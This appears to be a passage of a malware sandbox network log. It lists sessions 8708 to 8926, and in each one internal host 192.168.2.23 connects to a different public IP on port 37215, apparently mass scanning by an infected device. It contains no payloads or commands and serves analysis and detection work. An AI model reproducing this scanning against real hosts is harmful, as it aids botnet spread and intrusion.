                                          8708192.168.2.2344216157.241.164.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8709192.168.2.2348254197.248.154.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8710192.168.2.2339866175.254.101.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8711192.168.2.235948213.226.199.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8712192.168.2.2341976197.221.234.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8713192.168.2.2338908157.161.254.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8714192.168.2.233460241.98.141.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8715192.168.2.2340740197.151.70.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8716192.168.2.2359626126.186.14.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8717192.168.2.2350336148.100.232.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8718192.168.2.235754641.101.53.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8719192.168.2.234313441.225.120.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8720192.168.2.2356992138.126.201.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8721192.168.2.2346484176.202.57.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8722192.168.2.2353822171.205.187.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8723192.168.2.2352208157.189.88.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8724192.168.2.234201241.122.86.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8725192.168.2.2348536105.182.210.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8726192.168.2.2346414197.102.80.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8727192.168.2.2350904217.58.149.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8728192.168.2.2333910197.246.32.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8729192.168.2.2344658157.151.184.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8730192.168.2.2342214157.102.218.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8731192.168.2.2336164165.65.207.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8732192.168.2.23553749.71.211.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8733192.168.2.233528241.74.40.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8734192.168.2.234887641.129.65.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8735192.168.2.2350002157.62.187.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8736192.168.2.2358864218.184.182.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8737192.168.2.2340912197.44.155.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8738192.168.2.235863819.196.224.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8739192.168.2.2350258197.232.209.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8740192.168.2.2349598197.79.246.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8741192.168.2.2345070141.250.85.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8742192.168.2.234909241.240.25.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8743192.168.2.2349050197.203.178.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8744192.168.2.2339714157.195.144.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8745192.168.2.2352304100.168.44.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8746192.168.2.2354464157.141.226.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8747192.168.2.2355126197.202.128.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8748192.168.2.2358954197.168.229.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8749192.168.2.233889841.6.184.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8750192.168.2.234415680.65.216.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8751192.168.2.234093841.248.173.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8752192.168.2.2337948211.208.225.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8753192.168.2.2343774197.55.7.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8754192.168.2.235520413.190.111.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8755192.168.2.234851841.24.80.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8756192.168.2.2338434148.23.206.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8757192.168.2.2358356108.239.145.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8758192.168.2.2342684197.144.18.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8759192.168.2.2352634157.32.197.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8760192.168.2.2350476197.126.187.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8761192.168.2.2346144157.39.18.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8762192.168.2.2342350184.46.28.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8763192.168.2.234007036.97.172.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8764192.168.2.2341802157.73.115.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8765192.168.2.234939265.205.162.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8766192.168.2.235865081.103.223.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8767192.168.2.233951442.238.148.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8768192.168.2.2337024197.241.130.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8769192.168.2.2360770197.85.180.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8770192.168.2.2353186157.120.11.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8771192.168.2.235063041.106.195.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8772192.168.2.2353342157.48.101.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8773192.168.2.234552841.32.150.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8774192.168.2.2358398197.114.123.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8775192.168.2.2358582139.225.88.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8776192.168.2.233892241.194.81.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8777192.168.2.2339050222.95.118.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8778192.168.2.235802841.137.236.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8779192.168.2.2342770157.126.88.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8780192.168.2.2347204186.43.26.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8781192.168.2.233567241.21.228.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8782192.168.2.2354728157.206.121.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8783192.168.2.2339802157.203.157.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8784192.168.2.2336176197.177.156.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8785192.168.2.2348070197.10.153.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8786192.168.2.2352592157.177.224.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8787192.168.2.2357158157.205.15.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8788192.168.2.2348322140.84.26.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8789192.168.2.2352212157.216.103.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8790192.168.2.234509641.229.212.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8791192.168.2.2355014157.103.218.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8792192.168.2.2350452157.250.112.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8793192.168.2.2342922115.156.180.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8794192.168.2.2351668157.123.132.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8795192.168.2.2358674197.184.95.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8796192.168.2.2354756197.168.41.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8797192.168.2.2334150157.121.105.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8798192.168.2.2357648197.60.128.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8799192.168.2.2341208157.160.224.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8800192.168.2.2336546223.235.37.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8801192.168.2.2341240197.50.119.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8802192.168.2.234067441.89.170.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8803192.168.2.235309042.32.77.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8804192.168.2.2333802157.40.95.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8805192.168.2.2341142137.237.107.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8806192.168.2.234790441.11.205.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8807192.168.2.2334140197.235.124.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8808192.168.2.2337224197.74.129.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8809192.168.2.234488441.72.6.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8810192.168.2.2348482157.199.215.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8811192.168.2.2358432197.182.25.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8812192.168.2.235962241.48.249.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8813192.168.2.233876027.133.126.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8814192.168.2.2345552157.49.116.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8815192.168.2.2338164157.183.23.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8816192.168.2.2344690157.234.132.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8817192.168.2.2333930157.160.52.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8818192.168.2.2334518157.133.152.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8819192.168.2.2344104197.1.126.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8820192.168.2.2348836157.17.25.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8821192.168.2.233578641.141.10.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8822192.168.2.2355522157.235.184.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8823192.168.2.2340134157.8.75.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8824192.168.2.235559641.71.129.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8825192.168.2.2349516157.199.200.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8826192.168.2.2342782176.116.82.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8827192.168.2.23377149.31.82.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8828192.168.2.2336654157.129.97.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8829192.168.2.233280041.207.94.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8830192.168.2.2333084157.68.183.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8831192.168.2.2334464197.31.204.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8832192.168.2.23590468.56.25.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8833192.168.2.2360582188.207.121.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8834192.168.2.2337370157.93.113.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8835192.168.2.234996241.176.77.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8836192.168.2.2341682197.90.98.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8837192.168.2.235867441.109.179.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8838192.168.2.2344860197.86.4.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8839192.168.2.2333124118.203.242.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8840192.168.2.2342848151.161.42.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8841192.168.2.2337468197.163.211.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8842192.168.2.235706841.219.47.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8843192.168.2.2345942167.250.127.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8844192.168.2.2357584197.228.90.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8845192.168.2.2356182157.71.239.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8846192.168.2.2342762172.56.85.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8847192.168.2.233766041.160.228.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8848192.168.2.2341420157.147.246.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8849192.168.2.2340164197.67.28.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8850192.168.2.2348124157.5.146.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8851192.168.2.2340374197.99.100.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8852192.168.2.2336930197.128.26.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8853192.168.2.2338030197.57.155.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8854192.168.2.2339054157.44.250.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8855192.168.2.2336684168.144.235.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8856192.168.2.2355742180.36.220.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8857192.168.2.2335610197.213.8.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8858192.168.2.2333122197.65.248.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8859192.168.2.233825041.171.39.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8860192.168.2.2348300110.78.205.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8861192.168.2.2336612107.10.17.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8862192.168.2.2338100197.184.147.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8863192.168.2.2340702112.98.115.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8864192.168.2.2343192172.86.13.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8865192.168.2.233680881.232.119.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8866192.168.2.235848041.88.168.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8867192.168.2.235610441.25.134.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8868192.168.2.2359474197.181.60.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8869192.168.2.2347532197.224.84.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8870192.168.2.2336924197.127.218.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8871192.168.2.235621041.29.79.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8872192.168.2.235298841.189.185.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8873192.168.2.2347558197.231.56.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8874192.168.2.2345174157.125.153.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8875192.168.2.234564441.169.37.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8876192.168.2.233828641.96.0.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8877192.168.2.2339948157.61.172.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8878192.168.2.233784041.183.121.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8879192.168.2.233448441.34.43.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8880192.168.2.2353456157.182.67.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8881192.168.2.2335888119.214.200.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8882192.168.2.235908641.111.5.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8883192.168.2.234216641.142.121.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8884192.168.2.2343022129.191.137.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8885192.168.2.2360140157.250.249.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8886192.168.2.2341618133.13.41.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8887192.168.2.2352422157.161.76.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8888192.168.2.234843441.244.71.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8889192.168.2.2334724197.224.136.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8890192.168.2.234747082.212.94.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8891192.168.2.234455441.222.211.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8892192.168.2.233800641.67.30.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8893192.168.2.2347468197.141.71.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8894192.168.2.2351830157.40.17.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8895192.168.2.2352770157.117.247.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8896192.168.2.2339424197.245.159.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8897192.168.2.233551441.241.164.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8898192.168.2.2333880157.126.253.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8899192.168.2.2359728193.55.238.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8900192.168.2.233990240.205.140.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8901192.168.2.2349158174.245.35.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8902192.168.2.235094841.178.188.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8903192.168.2.2352740197.48.108.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8904192.168.2.233697841.30.196.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8905192.168.2.2346710197.250.191.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8906192.168.2.233562694.193.114.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8907192.168.2.233837241.217.61.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8908192.168.2.2349678197.241.157.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8909192.168.2.2351560157.88.183.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8910192.168.2.233326041.181.199.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8911192.168.2.234036875.188.67.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8912192.168.2.235829441.212.180.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8913192.168.2.234036441.85.122.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8914192.168.2.2348086197.28.70.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8915192.168.2.234190041.150.184.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8916192.168.2.2345892157.39.220.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8917192.168.2.2342018197.11.230.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8918192.168.2.2335908157.175.227.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8919192.168.2.2353276197.132.18.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8920192.168.2.234643841.170.202.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8921192.168.2.2356860157.22.48.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8922192.168.2.235416841.112.166.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8923192.168.2.2342022157.68.231.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8924192.168.2.2350254197.41.176.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8925192.168.2.235733441.228.27.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8926192.168.2.2359626157.68.195.21937215
